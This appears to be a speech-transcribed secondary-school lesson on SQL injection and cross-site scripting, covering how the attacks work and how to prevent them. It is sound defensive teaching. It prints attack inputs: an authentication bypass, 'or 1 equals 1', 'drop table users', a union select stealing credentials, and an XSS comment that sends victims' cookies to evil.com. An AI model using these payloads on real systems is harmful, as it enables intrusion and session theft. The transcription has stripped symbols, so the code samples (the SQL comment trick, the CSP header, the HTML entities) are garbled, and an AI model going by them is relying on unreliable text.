Welcome to SS2 Computer Science, Term 3, Week 11. Cybersecurity is the practice of protecting systems, networks, and data from digital attacks. Two of the most common and dangerous web application vulnerabilities are SQL injection and cross-site scripting, XSS. Understanding these attacks is critical for any developer, not to exploit systems, but to build secure ones. By the end of this lesson, you will understand how SQL injection and XSS attacks work, know how attackers exploit these vulnerabilities, and most importantly, know how to prevent them in web applications. This lesson is for defensive security education. Let us begin. What is SQL injection, SQL? SQL injection is an attack where a malicious user inserts SQL code into an input field, causing the application's database query to be modified in unintended ways. How it works. Background: many web applications construct SQL queries by concatenating user input directly into the query string. This is dangerous. Example of a vulnerable login system: the application builds this query, SQL equals select asterisk from users where username equals plus username plus, and password equals plus password plus. For legitimate use, username equals Chidi, password equals secret123, the query becomes, select asterisk from users where username equals Chidi and password equals secret123, returns the user if credentials are correct. SQL injection attack: attacker enters username equals admin and password equals anything. The query becomes, select asterisk from users where username equals admin and password equals anything. In SQL, is a comment, everything after is ignored. The actual executed query, select asterisk from users where username equals admin. The password check is bypassed, the attacker is logged in as admin without knowing the password. Other SQL injection techniques, or 1 equals 1, always true condition, select asterisk from users where username equals or 1 equals 1 returns all users. Drop table users, deletes the entire users table. Union-based injection: union select username, password from admin_users, steal data from other tables. Blind SQL injection: when the application doesn't return error messages, attackers ask yes/no questions through timing or Boolean-based responses. Prevention of SQL injection. Prevention method 1. Parameterized queries. Prepared statements: the single most effective prevention method. Instead of concatenating user input into the SQL string, use placeholders. The database driver then passes the user input as data, not code. SQL code structure is fixed, user input cannot change it. Python example with parameterized query: safe_query equals select asterisk from users where username equals %s and password equals %s, cursor.execute, safe_query, username, password. The cursor.execute function takes the query with %s placeholders and the values as a separate tuple. The database treats the values as data, not SQL code. Even if username contains SQL code, it is treated as a literal string and never executed. Node.js, MySQL2, example, cons query equals select asterisk from users where username equals and password equals connection.execute query. The placeholders ensure the values are parameterized. Prevention method 2. Input validation and sanitization. Validate that inputs match expected format, e.g. email must match email pattern, numbers must be numeric. Reject inputs that don't match expected format. Prevention method 3. Stored procedures. Predefined SQL procedures executed by the database, user input passed as parameters. Prevention method 4. Least privilege. The database user used by the application should have only the permissions it needs. Never use the root/admin database account for web application queries. If the web app only needs to select, it should have only select permission. Even if injection occurs, drop table cannot execute. Prevention method 5. Web application firewall. WAF detects and blocks common SQL injection patterns. Prevention method 6. Error handling. Never display detailed database error messages to users, they reveal information about the database structure. What is cross-site scripting, XSS? XSS is an attack where an attacker injects malicious JavaScript code into a web page that is then executed by other users' browsers. The attacker does not attack the server directly. Instead, the attacker causes the victim browser to execute the malicious script. Types of XSS: stored XSS, persistent XSS. The malicious script is stored in the database, e.g. in a comment, post, or message. Every user who views the page loads the malicious script. Most dangerous type: reflected XSS, non-persistent XSS. The malicious script is in the URL or form input. It is reflected back in the server's response immediately, requires the victim to click a malicious link. DOM-based XSS, the vulnerability is in client-side JavaScript itself. The malicious script modifies the DOM using user input. How stored XSS works: example, a social network where users can post comments. The comment form allows any text to be entered. An attacker enters a comment containing script fetch https://evil.com/c=$C++ The server stores this comment in the database. When any user visits the page, the browser renders the comment and executes the JavaScript. The malicious script sends the victim session cookies to the attacker server. The attacker uses the stolen cookies to impersonate the victim, session hijacking. XSS can also redirect users to phishing sites, display fake login forms that steal credentials, perform actions on behalf of the victim, make purchases, send messages, change passwords, install browser malware through drive-by downloads. Prevention of cross-site scripting. XSS prevention method 1. Output encoding, escaping when displaying user-provided content in HTML. Convert special characters to HTML entities. The 5 critical characters becomes an LT, becomes an GT, becomes an quote, becomes an #X27, and becomes an AMP. With encoding, an attacker's script alert XSS/script becomes an LT, script and GT, alert XSS, and LT/script and GT. The browser displays it as text, not as code. Prevention method 2. Use text content instead of inner HTML. In JavaScript, element.text content equals user input always treats the value as plain text, never HTML. Element.inner HTML equals user input is dangerous if user input comes from the user. Prevention method 3. Content security policy, CSP. An HTTP header that tells the browser which scripts are allowed to execute can prevent inline scripts and scripts from unknown origins entirely. Example header, content security policy, script SSCE itself, only scripts from the same domain are allowed. Prevention method 4. Input validation, validate and sanitize all user input, reject inputs containing HTML/JavaScript if HTML is not expected. Prevention method 5. HTTP-only cookies, set the HTTP-only flag on session cookies. This prevents JavaScript from reading cookie values. Document.cookie, even if XSS occurs, session cookies cannot be stolen. Prevention method 6. Security libraries, server-side, DOM Purify, JavaScript, OWASP Java HTML Sanitizer, Bleach, Python. Comparison of SQL injection and XSS. Both are injection attacks. Attacker injects code, SQL or JavaScript, where data is expected. SQL targets the database, XSS targets other users' browsers. SQL can destroy databases and steal all data. XSS can hijack user sessions and spread malware. Both are preventable with proper validation and encoding. Key points: cybersecurity, protecting systems from digital attacks. SQL injection, SQL attacker inserts SQL code into user input fields, exploits string concatenation in SQL queries, can bypass authentication, steal data, or destroy databases. Example, or 1 = 1 or drop table users. Prevention, parameterized queries, most effective, input validation, least privilege, WAF, hide error messages. Cross-site scripting, XSS attacker injects JavaScript into web pages, executed by victims' browsers, stored in database, reflected in URL, or DOM-based. XSS can steal cookies/session tokens, hijack accounts, redirect to phishing pages, spread malware. Prevention. Output encoding. HTML entities use text content not inner HTML, Content Security Policy, CSP, HTTP-only cookies, input validation, sanitization libraries. Both SQL and XSS are injection attacks, both prevented by treating user input as data, never as code. OWASP, Open Web Application Security Project, maintains the top 10 list of most critical web application security risks. SQL injection and XSS appear regularly. WAEC questions. Define SQL injection, explain how SQL works with an example, explain how to prevent SQL, define XSS, describe types of XSS, explain how to prevent XSS, compare SQL and XSS.